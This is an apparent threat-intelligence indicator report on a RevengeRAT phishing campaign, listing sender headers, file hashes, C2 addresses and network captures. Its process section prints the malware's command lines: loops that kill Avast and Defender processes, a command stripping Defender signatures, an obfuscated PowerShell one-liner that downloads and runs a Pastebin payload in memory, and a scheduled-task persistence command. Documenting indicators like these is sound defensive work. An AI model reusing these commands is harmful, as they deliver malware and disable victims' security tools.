VRad

#revengeRAT_110419

Apr 12th, 2019
  1. #IOC #OptiData #VR #revenge #RAT #mshta #powershell #RTF #XML #pastebin
  2.  
  3. https://pastebin.com/JKMHyvgx
  4.  
  5. References:
  6. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
  7. https://xakep.ru/2016/09/01/revenge-rat/
  8.  
  9. attack_vector
  10. --------------
  11. email attachment (.xlam / .doc) > mshta GET pastebin1 > powershell > GET pastebin2 (base64) > run decoded exe in memory(!)
  12.  
  13. email_headers
  14. --------------
  15. Received: from maiilboxin.com (unknown [138.197.202.86])
  16. Received: from [216.170.122.25]
  17. Subject: FW:PAYMENT -INV0978
  18. To: user00@victim1.com
  19. From: "Accounting dept." <support@maiilboxin.com>
  20. Date: Thu, 11 Apr 2019 17:25:23 -0700
  21.  
  22. files
  23. --------------
  24. SHA-256 1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595
  25. File name INV0978.xlam [Microsoft Excel 2007+, XML, Macro, Auto_Open]
  26. File size 21.67 KB (22188 bytes)
  27.  
  28. SHA-256 187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670
  29. File name TT copy.doc (RTF) [Rich Text Format data, version 1, ANSI]
  30. File size 356.87 KB (365432 bytes)
  31.  
  32. SHA-256 e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd
  33. File name aiahAcur (payload_1.exe) [PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows]
  34. File size 17 KB (17408 bytes)
  35.  
  36.  
  37. activity
  38. **************
  39. INV0978.xlam > mshta pastebin{.} com/raw/gnYu4MJK > powershell pastebin{.} com/raw/aiahAcur
  40.  
  41. TT copy.doc > mshta pastebin{.} com/raw/gnYu4MJK > powershell pastebin{.} com/raw/aiahAcur
  42.  
  43. PL_SRC: 104.20.209.21 pastebin{.} com/raw/aiahAcur
  44.  
  45. C2: 23.249.165.151 indexghost{.} duckdns{.} org
  46.  
  47. network
  48. --------------
  49. ssl
  50. 104.20.209.21 pastebin{.} com Client Hello
  51.  
  52. C2
  53. 23.249.165.151 [TCP ACKed unseen segment] 50092 → 2336 [PSH, ACK] Seq=322 Ack=12 Win=62499 Len=11
  54.  
  55. comp
  56. --------------
  57. mshta.exe 3540 TCP localhost 50090 104.20.209.21 443 ESTABLISHED
  58. powershell.exe 3960 TCP localhost 50091 104.20.209.21 443 ESTABLISHED
  59. powershell.exe 3960 TCP localhost 50092 23.249.165.151 2336 ESTABLISHED
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
  64.  
  65. C:\Windows\SysWOW64\mshta.exe https://pastebin{.} com/raw/gnYu4MJK
  66.  
  67. "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit
  68. C:\Windows\SysWOW64\forfiles.exe /c "taskkill /f /im AvastUi.exe"
  69.  
  70. "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit
  71.  
  72. "C:\Windows\System32\forfiles.exe" /c "cmd /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)"
  73. C:\Windows\SysWOW64\cmd.exe /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  74. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  75.  
  76. "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin{.} com/raw/aiahAcur\",0,true)(window.close)" /F
  77.  
  78. persist
  79. --------------
  80. \MSOFFICEER
  81. Microsoft (R) HTML Application host Microsoft Corporation
  82. c:\windows\system32\mshta.exe 14.10.2013 8:47
  83. "mshta" vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin{.} com/raw/aiahAcur",0,true)(window.close)
  84.  
  85. drop
  86. --------------
  87. [harmful]
  88. %temp%\fqkril4n.4zd.ps1
  89.  
  90. [harmless]
  91. %temp%\~DFC438B89F8956E942.TMP
  92. %temp%\9568250.od
  93. %temp%\CVRFFFA.tmp.cvr
  94.  
  95. # # #
  96. https://www.virustotal.com/gui/file/1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595/details
  97. https://www.virustotal.com/gui/file/187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670/details
  98. https://www.virustotal.com/gui/url/6b8f2a876d58ae681f494eac0d978800b2f3aa3d149abb55f6859c79ae238901/details
  99. https://www.virustotal.com/gui/url/5e197c5b281e3d7a436f2b0800180085e1a5ad5f80b3649ef3225e3fdafa8e38/details
  100. https://www.virustotal.com/gui/file/e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd/details
  101. https://analyze.intezer.com/#/analyses/a6f1dcf3-4672-4297-ac7a-a8f0f5b60c1d
  102.  
  103. VR